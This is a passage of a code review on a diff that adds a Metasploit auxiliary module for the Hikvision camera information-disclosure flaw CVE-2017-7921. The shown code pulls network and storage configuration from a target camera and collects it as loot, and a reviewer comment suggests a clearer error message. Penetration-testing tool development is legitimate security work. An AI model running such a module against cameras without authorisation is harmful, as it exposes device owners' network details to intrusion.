modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb

```diff
@@ -0,0 +1,374 @@
+    network_info = get_info(uri)
+
+    if network_info.nil?
+      print_error('Target server did not respond to the network info request.')
+    elsif network_info && network_info.code == 200
+      # process XML output and store in loot_data
+      xml_network_info = network_info.get_xml_document
+      if xml_network_info.blank?
+        print_error('No network info was found in the returned CSS code!')
+      else
+        loot_data << "Camera Network Information:\n"
+        loot_data << "---------------------------\n"
+        xml_network_info.css('NetworkInterface').each do |interface|
+          loot_data << "IP interface: #{interface.at_css('id').content}\n"
+          xml_network_info.css('IPAddress').each do |ip|
+            loot_data << "IP version: #{ip.at_css('ipVersion').content}\n"
+            loot_data << "IP assignment: #{ip.at_css('addressingType').content}\n"
+            loot_data << "IP address: #{ip.at_css('ipAddress').content}\n"
+            loot_data << "IP subnet mask: #{ip.at_css('subnetMask').content}\n"
+            xml_network_info.css('DefaultGateway').each do |gateway|
+              loot_data << "Default gateway: #{gateway.at_css('ipAddress').content}\n"
+            end
+            xml_network_info.css('PrimaryDNS').each do |dns|
+              loot_data << "Primary DNS: #{dns.at_css('ipAddress').content}\n"
+            end
+          end
+        end
+        loot_data << "\n"
+      end
+    else
+      print_error('No response received obtaining camera network configuration.')
+    end
+
+    # Get storage configuration
+    uri = normalize_uri(target_uri.path, 'System', 'Storage', 'volumes')
+    storage_info = get_info(uri)
+
+    if storage_info.nil?
+      print_error('Target server did not respond to the storage info request.')
+    elsif storage_info && storage_info.code == 200
+      # process XML output and store in loot
+      xml_storage_info = storage_info.get_xml_document
+      if xml_storage_info.blank?
+        print_error('No storage info was found in the returned CSS code!')
+      else
+        loot_data << "Camera Storage Information:\n"
+        loot_data << "---------------------------\n"
+        xml_storage_info.css('StorageVolume').each do |volume|
+          loot_data << "Storage volume name: #{volume.at_css('volumeName').content}\n"
+          loot_data << "Storage volume ID: #{volume.at_css('id').content}\n"
+          loot_data << "Storage volume description: #{volume.at_css('storageDescription').content}\n"
+          loot_data << "Storage device: #{volume.at_css('storageLocation').content}\n"
+          loot_data << "Storage type: #{volume.at_css('storageType').content}\n"
+          loot_data << "Storage capacity (MB): #{volume.at_css('capacity').content}\n"
+          loot_data << "Storage device status: #{volume.at_css('status').content}\n"
+        end
+      end
+    else
+      print_error('No response received obtaining camera storage configuration.')
```

Comment:
This condition looks only be reached if the response was not a `200` suggest:
```suggestion
      print_error('Response code invalid for obtaining camera storage configuration.')
```